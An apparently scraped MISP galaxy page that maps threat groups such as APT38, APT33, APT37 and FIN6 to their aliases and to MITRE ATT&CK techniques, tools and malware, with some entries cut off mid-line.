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<td><a href="https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html">https://www.fireeye.com/blog/threat-research/2015/06/operation-clandestine-wolf-adobe-flash-zero-day.html</a></td>
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<td><a href="https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf">https://attack.mitre.org/docs/APT3_Adversary_Emulation_Plan.pdf</a></td>
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APT38 - G0082

[APT38](https://attack.mitre.org/groups/G0082) is a financially-motivated threat group that is backed by the North Korean regime. The group mainly targets banks and financial institutions and has targeted more than 16 organizations in at least 13 countries since at least 2014.(Citation: FireEye APT38 Oct 2018)

North Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity. Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea.(Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff,(Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.

The tag is: misp-galaxy:mitre-intrusion-set="APT38 - G0082"

APT38 - G0082 is also known as:

- APT38

APT38 - G0082 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Clipboard Data - T1115" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-
• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="DarkComet - S0334" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Runtime Data Manipulation - T1565.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Transmitted Data Manipulation - T1565.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Stored Data Manipulation - T1565.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data Encrypted for Impact - T1486" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data Destruction - T1485" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

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**TA459 - G0062**

[TA459](https://attack.mitre.org/groups/G0062) is a threat group believed to operate out of China that has targeted countries including Russia, Belarus, Mongolia, and others. (Citation: Proofpoint TA459 April 2017)

The tag is: `misp-galaxy:mitre-intrusion-set="TA459 - G0062"`

TA459 - G0062 is also known as:

• TA459
TA459 - G0062 has relationships with:

- similar: misp-galaxy:threat-actor="TA459" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-malware="ZeroT - S0230" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="NetTraveler - S0033" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="PlugX - S0013" with estimative-language:likelihood-probability="almost-certain"

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MONSOON - G0042

The tag is: misp-galaxy:mitre-intrusion-set="MONSOON - G0042"

MONSOON - G0042 has relationships with:

- similar: misp-galaxy:threat-actor="Dropping Elephant" with estimative-language:likelihood-probability="likely"

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CopyKittens - G0052

[CopyKittens](https://attack.mitre.org/groups/G0052) is an Iranian cyber espionage group that has been operating since at least 2013. It has targeted countries including Israel, Saudi Arabia, Turkey, the U.S., Jordan, and Germany. The group is responsible for the campaign known as Operation Wilted Tulip. (Citation: ClearSky CopyKittens March 2017) (Citation: ClearSky Wilted Tulip July 2017) (Citation: CopyKittens Nov 2015)

The tag is: *misp-galaxy:mitre-intrusion-set="CopyKittens - G0052"

CopyKittens - G0052 is also known as:

- CopyKittens

CopyKittens - G0052 has relationships with:

- similar: *misp-galaxy:threat-actor="CopyKittens"* with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-malware="TDTESS - S0164"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-tool="Empire - S0363"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Hidden Window - T1564.003"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="Cobalt Strike - S0154"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="Matryoshka - S0167"* with estimative-language:likelihood-probability="almost-certain"

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<td><a href="http://www.clearskysec.com/copykitten-jpost/">http://www.clearskysec.com/copykitten-jpost/</a></td>
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Honeybee - G0072

[Honeybee](https://attack.mitre.org/groups/G0072) is a campaign led by an unknown actor that targets humanitarian aid organizations and has been active in Vietnam, Singapore, Argentina, Japan, Indonesia, and Canada. It has been an active operation since August of 2017 and as recently as February 2018. (Citation: McAfee Honeybee)

The tag is: *misp-galaxy:mitre-intrusion-set=“Honeybee - G0072”*

Honeybee - G0072 is also known as:

- Honeybee

Honeybee - G0072 has relationships with:


- uses: *misp-galaxy:mitre-attack-pattern="AppCert DLLs - T1546.009" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-tool="cmd - S0106" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"


- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-tool="Reg - S0075" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-tool="Systeminfo - S0096" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

- uses: *misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with
• uses: misp-galaxy:mitre-tool="Tasklist - S0057" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Service Execution - T1569.002" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Automated Exfiltration - T1020" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

Table 4344. Table References

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<tr>
<td><a href="https://attack.mitre.org/groups/G0072">https://attack.mitre.org/groups/G0072</a></td>
</tr>
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</table>

**APT33 - G0064**

[APT33](https://attack.mitre.org/groups/G0064) is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations across multiple industries in the United States, Saudi Arabia, and South Korea, with a particular interest in the aviation and energy sectors. (Citation: FireEye APT33 Sept 2017) (Citation: FireEye APT33 Webinar Sept 2017)

The tag is: `misp-galaxy:mitre-intrusion-set="APT33 - G0064"`

APT33 - G0064 is also known as:
APT33 - G0064 has relationships with:

- similar: misp-galaxy:threat-actor="APT33" with estimative-language:likelihood-probability="likely"
- similar: misp-galaxy:threat-actor="MAGNALLIUM" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="NETWIRE - S0198" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="TURNEDUP - S0199" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="NanoCore - S0336" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Ruler - S0358" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Empire - S0363" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Pupy - S0192" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="AutoIt backdoor - S0129" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="FTP - S0095" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Network Sniffing - T1040" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-
• uses: misp-galaxy:mitre-attack-pattern="Archive via Utility - T1560.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="LaZagne - S0349" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="PowerSploit - S0194" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="POWERTON - S0371" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Password Spraying - T1110.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="PoshC2 - S0378" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="StoneDrill - S0380" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Credentials In Files - T1552.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-
APT34 - G0057

APT34 is an Iranian cyber espionage group that has been active since at least 2014. The group has targeted a variety of industries, including financial, government, energy, chemical, and telecommunications, and has largely focused its operations within the Middle East. FireEye assesses that the group works on behalf of the Iranian government based on infrastructure details that contain references to Iran, use of Iranian infrastructure, and targeting that aligns with nation-state interests. APT34 loosely aligns with public reporting related to OilRig, but may not wholly align due to companies tracking threat groups in different ways. (Citation: FireEye APT34 Dec 2017)
Group5 - G0043

[Group5](https://attack.mitre.org/groups/G0043) is a threat group with a suspected Iranian nexus, though this attribution is not definite. The group has targeted individuals connected to the Syrian opposition via spearphishing and watering holes, normally using Syrian and Iranian themes. [Group5](https://attack.mitre.org/groups/G0043) has used two commonly available remote access tools (RATs), [njRAT](https://attack.mitre.org/software/S0385) and [NanoCore](https://attack.mitre.org/software/S0336), as well as an Android RAT, DroidJack. (Citation: Citizen Lab Group5)

Group5 - G0043 is also known as:

- Group5

Group5 - G0043 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="Uncommonly Used Port - T1065" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="njRAT - S0385" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="NanoCore - S0336" with estimative-language:likelihood-probability="almost-certain"
FIN5 - G0053

[FIN5](https://attack.mitre.org/groups/G0053) is a financially motivated threat group that has targeted personally identifiable information and payment card information. The group has been active since at least 2008 and has targeted the restaurant, gaming, and hotel industries. The group is made up of actors who likely speak Russian. (Citation: FireEye Respond Webinar July 2017) (Citation: Mandiant FIN5 GrrCON Oct 2016) (Citation: DarkReading FireEye FIN5 Oct 2015)

The tag is: `misp-galaxy:mitre-intrusion-set="FIN5 - G0053"`

FIN5 - G0053 is also known as:

- FIN5

FIN5 - G0053 has relationships with:

- uses: `misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-malware="RawPOS - S0169" with estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-tool="SDelete - S0195" with estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"`
• uses: misp-galaxy:mitre-attack-pattern="Command and Scripting Interpreter - T1059" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="External Remote Services - T1133" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="FLIPSIDE - S0173" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Automated Collection - T1119" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0053">https://attack.mitre.org/groups/G0053</a></td>
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<td><a href="https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html">https://www2.fireeye.com/WBNR-Are-you-ready-to-respond.html</a></td>
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**Dragonfly - G0035**

[Dragonfly](https://attack.mitre.org/groups/G0035) is a cyber espionage group that has been active since at least 2011. They initially targeted defense and aviation companies but shifted to focus to include the energy sector in early 2013. They have also targeted companies related to industrial control systems. (Citation: Symantec Dragonfly)(Citation: Secureworks IRON LIBERTY July 2019)

A similar group emerged in 2015 and was identified by Symantec as [Dragonfly 2.0](https://attack.mitre.org/groups/G0074). There is debate over the extent of the overlap between [Dragonfly](https://attack.mitre.org/groups/G0035) and [Dragonfly 2.0](https://attack.mitre.org/groups/G0074), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Symantec Dragonfly Sept 2017)(Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY)

The tag is: **misp-galaxy:mitre-intrusion-set="Dragonfly - G0035"**

**Dragonfly - G0035** is also known as:

• Dragonfly

• TG-4192

• Crouching Yeti

• IRON LIBERTY

• Energetic Bear

**Dragonfly - G0035** has relationships with:

• similar: misp-galaxy:threat-actor="Energetic Bear" with estimative-language:likelihood-
probability="likely"


- uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

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**APT37 - G0067**

[APT37](https://attack.mitre.org/groups/G0067) is a suspected North Korean cyber espionage group that has been active since at least 2012. The group has targeted victims primarily in South Korea, but also in Japan, Vietnam, Russia, Nepal, China, India, Romania, Kuwait, and other parts of the Middle East. [APT37](https://attack.mitre.org/groups/G0067) has also been linked to following campaigns between 2016-2018: Operation Daybreak, Operation Erebus, Golden Time, Evil New Year, Are you Happy?, FreeMilk, Northern Korean Human Rights, and Evil New Year 2018. (Citation: FireEye APT37 Feb 2018) (Citation: Securelist ScarCruft Jun 2016) (Citation: Talos Group123)

North Korean group definitions are known to have significant overlap, and the name [Lazarus Group](https://attack.mitre.org/groups/G0032) is known to encompass a broad range of activity.
Some organizations use the name Lazarus Group to refer to any activity attributed to North Korea. (Citation: US-CERT HIDDEN COBRA June 2017) Some organizations track North Korean clusters or groups such as Bluenoroff, (Citation: Kaspersky Lazarus Under The Hood Blog 2017) [APT37](https://attack.mitre.org/groups/G0067), and [APT38](https://attack.mitre.org/groups/G0082) separately, while other organizations may track some activity associated with those group names by the name Lazarus Group.

The tag is: *misp-galaxy:mitre-intrusion-set="APT37 - G0067"*

**APT37 - G0067** is also known as:

- APT37
- ScarCruft
- Reaper
- Group123
- TEMP.Reaper

**APT37 - G0067** has relationships with:

- similar: *misp-galaxy:threat-actor="APT37"* with estimative-language:likelihood-probability="likely"
- uses: *misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-malware="ROKRAT - S0240"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Data from Local System - T1005"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="System Information Discovery - T1082"* with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105"* with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-malware="KARAE - S0215" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="POORAIM - S0216" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Native API - T1106" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="NavRAT - S0247" with estimative-language:likelihood-probability="almost-certain"


• uses: misp-galaxy:mitre-malware="Final1stspy - S0355" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Process Injection - T1055" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="SLOWDRIFT - S0218" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="WINERACK - S0219" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Web Protocols - T1071.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Disk Structure Wipe - T1561.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="SHUTTERSPEED - S0217" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bidirectional Communication - T1102.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="DOGCALL - S0213" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Invalid Code Signature - T1036.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-malware="HAPPYWORK - S0214" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Dynamic Data Exchange - T1559.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Peripheral Device Discovery - T1120" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Bypass User Account Control - T1548.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Shutdown/Reboot - T1529" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Steganography - T1027.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"

Table 4350. Table References

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</table>

FIN6 - G0037

[FIN6](https://attack.mitre.org/groups/G0037) is a cyber crime group that has stolen payment card data and sold it for profit on underground marketplaces. This group has aggressively targeted and compromised point of sale (PoS) systems in the hospitality and retail sectors.(Citation: FireEye FIN6 April 2016)(Citation: FireEye FIN6 Apr 2019)

The tag is: misp-galaxy:mitre-intrusion-set="FIN6 - G0037"

FIN6 - G0037 is also known as:

• FIN6
• Magecart Group 6
• SKELETON SPIDER
FIN6 - G0037 has relationships with:

- similar: misp-galaxy:threat-actor="FIN6" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Asymmetric Cryptography - T1573.002" with estimative-
uses: misp-galaxy:mitre-malware="LockerGoga - S0372" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Masquerade Task or Service - T1036.004" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Web Service - T1102" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="More_eggs - S0284" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="NTDS - T1003.003" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="Ryuk - S0446" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Disable or Modify Tools - T1562.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="FrameworkPOS - S0503" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="Maze - S0449" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with
estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Credentials from Password Stores - T1555" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="JavaScript - T1059.007" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-malware="FlawedAmmyy - S0381" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-attack-pattern="Data from Information Repositories - T1213" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-malware="Cobalt Strike - S0154" with estimative-language:likelihood-probability="almost-certain"

- uses: misp-galaxy:mitre-tool="AdFind - S0552" with estimative-language:likelihood-probability="almost-certain"

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<td><a href="https://attack.mitre.org/groups/G0037">https://attack.mitre.org/groups/G0037</a></td>
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</table>

**GCMAN - G0036**

[GCMAN](https://attack.mitre.org/groups/G0036) is a threat group that focuses on targeting banks for the purpose of transferring money to e-currency services. (Citation: Securelist GCMAN)
The tag is: `misp-galaxy:mitre-intrusion-set="GCMAN - G0036"`

GCMAN - G0036 is also known as:

- GCMAN

GCMAN - G0036 has relationships with:

- similar: `misp-galaxy:threat-actor="GCMAN"` with `estimative-language:likelihood-probability="likely"`
- uses: `misp-galaxy:mitre-attack-pattern="SSH - T1021.004"` with `estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="VNC - T1021.005"` with `estimative-language:likelihood-probability="almost-certain"`

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<td><a href="https://attack.mitre.org/groups/G0036">https://attack.mitre.org/groups/G0036</a></td>
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**BlackOasis - G0063**

[BlackOasis](https://attack.mitre.org/groups/G0063) is a Middle Eastern threat group that is believed to be a customer of Gamma Group. The group has shown interest in prominent figures in the United Nations, as well as opposition bloggers, activists, regional news correspondents, and think tanks. (Citation: Securelist BlackOasis Oct 2017) (Citation: Securelist APT Trends Q2 2017) A group known by Microsoft as [NEODYMIUM](https://attack.mitre.org/groups/G0055) is reportedly associated closely with [BlackOasis](https://attack.mitre.org/groups/G0063) operations, but evidence that the group names are aliases has not been identified. (Citation: CyberScoop BlackOasis Oct 2017)

The tag is: `misp-galaxy:mitre-intrusion-set="BlackOasis - G0063"`

BlackOasis - G0063 is also known as:

- BlackOasis

BlackOasis - G0063 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027"` with `estimative-language:likelihood-probability="almost-certain"`

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APT39 - G0087

[APT39](https://attack.mitre.org/groups/G0087) is one of several names for cyberespionage activity conducted by the Iranian Ministry of Intelligence and Security (MOIS) through the front company Rana Intelligence Computing since at least 2014. [APT39](https://attack.mitre.org/groups/G0087) has primarily targeted the travel, hospitality, academic, and telecommunications industries in Iran and across Asia, Africa, Europe, and North America to track individuals and entities considered to be a threat by the MOIS.(Citation: FireEye APT39 Jan 2019)(Citation: Symantec Chafer Dec 2015)(Citation: FBI FLASH APT39 September 2020)(Citation: Dept. of Treasury Iran Sanctions September 2020)(Citation: DOJ Iran Indictments September 2020)

The tag is: *misp-galaxy:mitre-intrusion-set="APT39 - G0087"

APT39 - G0087 is also known as:

- APT39
- REMIX KITTEN
- ITG07
- Chafer

APT39 - G0087 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
